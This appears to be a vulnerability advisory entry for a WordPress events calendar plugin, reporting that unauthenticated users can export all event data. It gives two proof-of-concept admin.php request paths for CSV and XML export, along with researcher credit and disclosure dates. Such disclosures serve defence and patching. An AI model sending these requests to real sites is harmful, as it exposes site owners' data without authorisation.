The plugin did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.
https://drive.google.com/file/d/1lLEXDyPp4LcKoCOqYS7A-0Yg_pIQD-ND/view?usp=sharing /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml
Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)
khanh
Yes
2021-01-29 (about 2 years ago)
2021-01-29 (about 2 years ago)
2021-01-31 (about 2 years ago)